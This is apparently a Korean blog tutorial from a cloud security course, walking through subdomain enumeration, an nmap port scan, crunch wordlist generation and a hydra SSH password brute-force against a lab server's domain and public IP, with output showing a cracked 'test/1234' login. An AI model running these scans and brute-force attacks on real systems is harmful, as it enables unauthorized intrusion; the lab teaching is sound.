brunch
매거진 NCP Security

(정식) 보안 2. 보안 공격

by Master Seo
Jul 13. 2025


<1> 우분트에 보안 공격 패키지 설치

<2> 도메인 조회 - nct-seoul.com

<3> 포트 스캔

<4> 패스워드 사전 - 설정

<5> ssh 접속 공격



<1> 우분트에 보안 공격 패키지 설치



apt-get update -y

apt-get install dnsmap

apt-get install nmap

apt-get install crunch

apt-get install hydra






<2> 도메인 조회 - nct-seoul.com


2. 도메인 조회

dnsmap nct-seoul.com

blog.nct-seoul.com

IP address #1: 211.188.53.97

test.nct-seoul.com

IP address #1: 211.188.53.97

www.nct-seoul.com

IP address #1: 211.188.53.97

[+] 3 (sub)domains and 3 IP address(es) found

[+] completion time: 10 second(s)

root@hacker01:~#




숙제 참고

https://brunch.co.kr/@topasvga/4664

(정식) 보안1. VPC 생성, 서버 생성

# 실습 환경 생성 # 네트워크 VPC를 생성하자. # 우분투 서버 생성하자. <1> 실습 환경 <2> VPC1 172.16, 우분트 24.04 1대 생성 <3> VPC2 10.0 , 로키 리눅스 2대 생성 <1> 실습 환경 1 vpc2 생성 10.0.0.0/20 publlic su

https://brunch.co.kr/@topasvga/undefined/@topasvga/4664

 


<3> 포트 스캔


nmap -Pn -p 22 -sV -T4 211.188.53.97


PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.7 (protocol 2.0)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds

root@hacker01:~#




<4> 패스워드 사전 - 설정


‘패스워드 사전’ 생성

crunch 4 4 1234 -o dic.txt


root@hacker01:~# more dic.txt

1111

1112

1113

1114

1121

1122

1123

1124

1131

1132

1133



# 참고 - 5자리 영문자 조합 만들기

crunch 5 5 abcdefghijklmnopqrstuvwxyz -o dic.txt

aaaaa ~ zzzzz 까지 생성됩니다.




<5> ssh 접속 공격



5. 패스워드 접속 대입 공격

hydra -t 4 -l test -P dic.txt 서버공인ip(타깃Target_IP) ssh


hydra -t 4 -l test -P dic.txt 211.188.53.97 ssh


[DATA] attacking ssh://211.188.53.97:22/

[22][ssh] host: 211.188.53.97 login: test password: 1234

1 of 1 target successfully completed, 1 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-26 13:41:59



hydra -t 4 -l test -P dic.txt 211.188.53.97 ssh

hydra
→ THC-Hydra라는 툴(병렬 로그인 시도/브루트포스 도구)을 실행한다는 명령어 이름입니다.

-t 4
→ 동시에 실행할 작업(task, 스레드)의 수를 4개로 설정합니다(동시 접속 시도 수).

-l test



다음

https://brunch.co.kr/@topasvga/4713

(정식)보안4. 시스템 보안 강화

<1> SSH 설정 변경 - Root 로그인 차단 <1> SSH 설정 변경 - Root 로그인 차단 OS버전별로 설정법이 달라짐 1 # 로키 리눅스 9.4 useradd topas passwd topas [root@ro94 sshd_config.d]# pwd /etc/ssh/sshd_config.d [root@ro94 sshd_conf

https://brunch.co.kr/@topasvga/4713

 



keyword
Master Seo 소속 클라우드전문가카페 직업 엔지니어 프로필

전) 네이버 엔지니어 7년, 네이버 클라우드 공인강사,마스터, PRO , AWS아키프로, Google프로아키, Azure어드민, CCNP, 맛집,여행 전문가, 좋은 기운을 주는사람

구독자 2,546
매거진의 이전글(정식) 보안1. VPC 생성, 서버 생성